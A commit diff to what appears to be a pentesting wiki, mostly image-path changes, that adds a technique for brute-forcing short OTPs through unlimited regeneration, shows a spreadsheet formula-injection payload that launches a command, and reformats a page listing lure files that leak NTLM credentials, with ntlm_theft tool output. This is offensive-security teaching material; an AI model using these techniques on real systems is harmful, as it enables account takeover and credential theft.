GitBook: [master] 9 pages and 22 assets modified

1911-pentesting-fox.md

@@ -10,7 +10,7 @@ dht udp "DHT Nodes"
 
 ![](.gitbook/assets/image%20%28182%29.png)
 
-![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
+![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
 
 InfluxDB
 

SUMMARY.md

@@ -297,7 +297,7 @@
 
 ## Pentesting Web
 
-* [2FA Bypass](pentesting-web/2fa-bypass.md)
+* [2FA/OTP Bypass](pentesting-web/2fa-bypass.md)
 * [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
 * [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
 * [Captcha Bypass](pentesting-web/captcha-bypass.md)

forensics/basic-forensics-esp/linux-forensics.md

@@ -395,7 +395,7 @@ Partition Record Format:
 
 In order to mount a MBR in Linux you first need to get the start offset \(you can use `fdisk` and the the `p` command\)
 
-![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%281%29.png)
+![](../../.gitbook/assets/image%20%28413%29%20%283%29%20%283%29%20%281%29.png)
 
 An then use the following code
 

mobile-apps-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md

@@ -76,7 +76,7 @@ When checking the code of the Content Provider **look** also for **functions** n
 
 ![](../../../.gitbook/assets/image%20%28211%29.png)
 
-![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
+![](../../../.gitbook/assets/image%20%28254%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29%20%281%29.png)
 
 Because you will be able to call them
 

pentesting-web/2fa-bypass.md

@@ -1,4 +1,4 @@
-# 2FA Bypass
+# 2FA/OTP Bypass
 
 ## **Bypassing two-factor authentication**
 
@@ -57,6 +57,10 @@ Sometimes you can configure the 2FA for some actions inside your account \(chang
 
 You want be able to bypass the 2FA but you will be able to waste money of the company.
 
+#### Infinite OTP regeneration
+
+If you can **generate a new OTP infinite times**, the **OTP is simple enough** \(4 numbers\), and you can try up to 4 or 5 tokens per generated OTP, you can just try the same 4 or 5 tokens every time and generate OTPs until it matches the ones you are using.
+
 ### CSRF/Clickjacking
 
 Check if there is a CSRF or a Clickjacking vulnerability to disable the 2FA. 

pentesting-web/formula-injection.md

@@ -41,5 +41,5 @@ The good news is that **this payload is executed automatically when the file is
 
 It's possible to execute a calculator with the following payload **`=cmd|' /C calc'!xxx`**
 
-![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
+![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
 

pentesting/pentesting-web/wordpress.md

@@ -183,7 +183,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
 </methodCall>
 ```
 
-![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
+![](../../.gitbook/assets/image%20%28107%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
 
 ![](../../.gitbook/assets/image%20%28224%29.png)
 

phishing-methodology/README.md

@@ -320,7 +320,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
 * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
 * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
 
-![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29.png)
+![](../.gitbook/assets/image%20%28253%29%20%281%29%20%282%29%20%281%29.png)
 
 {% hint style="info" %}
 It's recommended to use the "**Send Test Email**" functionality to test that everything is working.  

windows/ntlm/places-to-steal-ntlm-creds.md

@@ -6,58 +6,70 @@
 
 This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**.
 
-#### ntlm_theft supports the following attack types:
+#### ntlm\_theft supports the following attack types:
+
 Browse to Folder Containing:
-- .url – via URL field
-- .url – via ICONFILE field
-- .lnk - via icon_location field
-- .scf – via ICONFILE field (Not Working on Latest Windows)
-- autorun.inf via OPEN field (Not Working on Latest Windows)
-- desktop.ini - via IconResource field (Not Working on Latest Windows)
+
+* .url – via URL field
+* .url – via ICONFILE field
+* .lnk - via icon\_location field
+* .scf – via ICONFILE field \(Not Working on Latest Windows\)
+* autorun.inf via OPEN field \(Not Working on Latest Windows\)
+* desktop.ini - via IconResource field \(Not Working on Latest Windows\)
 
 Open Document:
-- .xml – via Microsoft Word external stylesheet
-- .xml – via Microsoft Word includepicture field
-- .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
-- .docx – via Microsoft Word includepicture field
--.docx – via Microsoft Word external template
--.docx – via Microsoft Word frameset webSettings
--.xlsx - via Microsoft Excel external cell
--.wax - via Windows Media Player playlist (Better, primary open)
--.asx – via Windows Media Player playlist (Better, primary open)
--.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
--.jnlp – via Java external jar
--.application – via any Browser (Must be served via a browser downloaded or won’t run)
+
+* .xml – via Microsoft Word external stylesheet
+* .xml – via Microsoft Word includepicture field
+* .htm – via Chrome & IE & Edge img src \(only if opened locally, not hosted\)
+* .docx – via Microsoft Word includepicture field
+
+  -.docx – via Microsoft Word external template
+
+  -.docx – via Microsoft Word frameset webSettings
+
+  -.xlsx - via Microsoft Excel external cell
+
+  -.wax - via Windows Media Player playlist \(Better, primary open\)
+
+  -.asx – via Windows Media Player playlist \(Better, primary open\)
+
+  -.m3u – via Windows Media Player playlist \(Worse, Win10 opens first in Groovy\)
+
+  -.jnlp – via Java external jar
+
+  -.application – via any Browser \(Must be served via a browser downloaded or won’t run\)
 
 Open Document and Accept Popup:
-- .pdf – via Adobe Acrobat Reader
 
+* .pdf – via Adobe Acrobat Reader
 
 Click Link in Chat Program:
-- .txt – formatted link to paste into Zoom chat
+
+* .txt – formatted link to paste into Zoom chat
 
 > Example :
-```sh
-# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
-Created: test/test.scf (BROWSE)
-Created: test/test-(url).url (BROWSE)
-Created: test/test-(icon).url (BROWSE)
-Created: test/test.rtf (OPEN)
-Created: test/test-(stylesheet).xml (OPEN)
-Created: test/test-(fulldocx).xml (OPEN)
-Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
-Created: test/test-(includepicture).docx (OPEN)
-Created: test/test-(remotetemplate).docx (OPEN)
-Created: test/test-(frameset).docx (OPEN)
-Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
-Created: test/test.asx (OPEN)
-Created: test/test.jnlp (OPEN)
-Created: test/test.application (DOWNLOAD AND OPEN)
-Created: test/test.pdf (OPEN AND ALLOW)
-Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
-Generation Complete.
-```
-
+>
+> ```bash
+> # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
+> Created: test/test.scf (BROWSE)
+> Created: test/test-(url).url (BROWSE)
+> Created: test/test-(icon).url (BROWSE)
+> Created: test/test.rtf (OPEN)
+> Created: test/test-(stylesheet).xml (OPEN)
+> Created: test/test-(fulldocx).xml (OPEN)
+> Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
+> Created: test/test-(includepicture).docx (OPEN)
+> Created: test/test-(remotetemplate).docx (OPEN)
+> Created: test/test-(frameset).docx (OPEN)
+> Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
+> Created: test/test.asx (OPEN)
+> Created: test/test.jnlp (OPEN)
+> Created: test/test.application (DOWNLOAD AND OPEN)
+> Created: test/test.pdf (OPEN AND ALLOW)
+> Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
+> Generation Complete.
+> ```
 
 ### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All_NTLM_leak)